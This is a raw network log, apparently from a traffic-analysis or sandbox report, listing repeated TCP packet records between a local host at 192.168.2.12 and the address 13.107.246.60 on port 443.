Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49765
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49765
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49766
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49766
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49765
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49766
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49765
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49766
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49766
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49765
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49765
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49765
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
